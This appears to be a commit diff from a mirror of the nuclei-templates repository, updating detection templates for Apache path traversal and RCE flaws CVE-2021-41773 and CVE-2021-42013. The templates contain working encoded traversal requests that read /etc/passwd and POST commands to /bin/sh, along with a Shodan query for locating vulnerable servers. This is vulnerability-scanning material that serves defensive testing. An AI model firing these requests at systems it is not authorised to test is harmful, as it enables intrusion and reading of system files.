daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #5188 from 666asd/CVE-2021-42013 

Updated CVE-2021-41773.yaml CVE-2021-42013.yaml
patch-1
Prince Chaddha 2022-08-25 13:34:33 +05:30 committed by GitHub
parent ef9f76b66d 2ff98d6879
commit 028f4cb70f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 18 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
cves/2021/CVE-2021-41773.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2021-41773
info:
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
author: daffainfo
author: daffainfo,666asd
severity: high
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
reference:
@ -19,22 +19,27 @@ info:
cve-id: CVE-2021-41773
cwe-id: CWE-22
metadata:
verified: true
shodan-query: apache version:2.4.49
tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
variables:
cmd: "echo COP-37714-1202-EVC | rev"
requests:
- raw:
- |
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: {{Hostname}}
- |
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev
echo Content-Type: text/plain; echo; {{cmd}}
stop-at-first-match: true
matchers-condition: or
matchers:

12
cves/2021/CVE-2021-42013.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2021-42013
info:
name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
author: nvn1729,0xd0ff9
author: nvn1729,0xd0ff9,666asd
severity: critical
description: |
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
@ -17,12 +17,17 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-42013
cwe-id: CWE-22
metadata:
verified: true
tags: cve,cve2021,lfi,apache,rce,misconfig,traversal,kev
variables:
cmd: "echo COP-37714-1202-EVC | rev"
requests:
- raw:
- |+
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
@ -37,8 +42,9 @@ requests:
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
echo Content-Type: text/plain; echo; echo 31024-1202-EVC | rev
echo Echo: CVE-2021-42013; echo; {{cmd}};
stop-at-first-match: true
unsafe: true
matchers-condition: or
matchers: